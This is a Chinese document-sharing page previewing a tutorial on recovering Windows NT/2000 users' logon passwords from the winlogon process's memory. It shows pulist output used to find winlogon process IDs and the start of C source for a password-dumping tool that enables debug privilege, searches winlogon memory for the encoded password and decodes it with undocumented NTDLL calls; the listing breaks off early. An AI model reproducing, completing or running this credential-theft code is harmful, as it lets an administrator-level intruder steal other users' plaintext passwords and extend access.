收藏
下载资源

获取windows登陆账户密码

上传人:第*** 文档编号:31524650 上传时间:2018-02-08 格式:DOCX 页数:19 大小:23.88KB
返回 下载 相关 举报
获取windows登陆账户密码_第1页
第1页 / 共19页
获取windows登陆账户密码_第2页
第2页 / 共19页
获取windows登陆账户密码_第3页
第3页 / 共19页
获取windows登陆账户密码_第4页
第4页 / 共19页
获取windows登陆账户密码_第5页
第5页 / 共19页
点击查看更多>>
资源描述

《获取windows登陆账户密码》由会员分享,可在线阅读,更多相关《获取windows登陆账户密码(19页珍藏版)》请在金锄头文库上搜索。

1、Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出。因为登陆的域名和用户名是明文存储在 winlogon 进程里的,而 Password 是限定了查找本进程用户的密码,然后到 winlogon 进程的空间中查找 UserDomain 和 UserName ,找到后就查后边的加密口令。其实只要你自己指定用户名和 winlogon 进程去查找就行了,只要你是管理员,任何本机用msgina.dll 图形登陆的用户口令都可以找到。1. pulist,找到系统里登陆的域名和用户名,及 winlogon 进程 id 2. 然后给每个 winlogon 进程

2、id 查找指定的用户就行了。example:C:Documents and Settingsbinglepulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITYSYSTEM csrss.exe 192 NT AUTHORITYSYSTEM winlogon.exe 188 NT AUTHORITYSYSTEM wins.exe 1212 NT AUTHORITYSYSTEM Explorer.exe 388 TEST-2KSERVERAdministrator internat.exe 1828 TEST-2KSERVE

3、RAdministrator conime.exe 1868 TEST-2KSERVERAdministrator msiexec.exe 1904 NT AUTHORITYSYSTEM tlntsvr.exe 1048 NT AUTHORITYSYSTEM taskmgr.exe 1752 TEST-2KSERVERAdministrator csrss.exe 2056 NT AUTHORITYSYSTEM winlogon.exe 2416 NT AUTHORITYSYSTEM rdpclip.exe 2448 TEST-2KSERVERclovea Explorer.exe 2408

4、TEST-2KSERVERclovea internat.exe 1480 TEST-2KSERVERclovea cmd.exe 2508 TEST-2KSERVERAdministrator ntshell.exe 368 TEST-2KSERVERAdministrator ntshell.exe 1548 TEST-2KSERVERAdministrator ntshell.exe 1504 TEST-2KSERVERAdministrator csrss.exe 1088 NT AUTHORITYSYSTEM winlogon.exe 1876 NT AUTHORITYSYSTEM

5、rdpclip.exe 1680 TEST-2KSERVERbingle Explorer.exe 2244 TEST-2KSERVERbingle conime.exe 2288 TEST-2KSERVERbingle internat.exe 1592 TEST-2KSERVERbingle cmd.exe 1692 TEST-2KSERVERbingle mdm.exe 2476 TEST-2KSERVERbingle taskmgr.exe 752 TEST-2KSERVERbingle pulist.exe 2532 TEST-2KSERVERbingle具体实现代码如下双击代码全选

6、#include #include #include #include typedef struct _UNICODE_STRING USHORT Length; USHORT MaximumLength; PWSTR Buffer; UNICODE_STRING, *PUNICODE_STRING; / Undocumented typedefs typedef struct _QUERY_SYSTEM_INFORMATION DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; QUERY

7、_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER DWORD Count; DWORD Unk04; DWORD Unk08; PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name 0x108; PROCESS_INF

8、O, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (_stdcall

9、*PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (_stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (_stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (_stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (_stdca

10、ll *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); / Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (

11、void); void DisplayPasswordWin2K (void); / Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebug

12、Buffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName 0x400; wchar_t UserDomain 0x400; int _cdecl main( int argc, char* argv ) printf( nt To Find Password in the Winlogon

13、processn ); printf( Usage: %s DomainName UserName PID-of-WinLogonnn, argv0 ); if (!IsWinNT () & (!IsWin2K () printf (Windows NT or Windows 2000 are required.n); return (0); / Add debug privilege to PasswordReminder - / this is needed for the search for Winlogon. / 增加 PasswordReminder 的权限 / 使得 PasswordReminder 可以打开并调试 Winlogon 进程 if (!AddDebugPrivilege () printf (Unable to add debug privilege.n); return (0); printf (The debug privilege has been added to PasswordReminder.n); / 获得几个未公开 API 的入口地址 HINSTANCE hNtDll = LoadLibrary (NTDLL.DLL); pfnNtQuerySystemInformation =

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 办公文档 > 其它办公文档

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号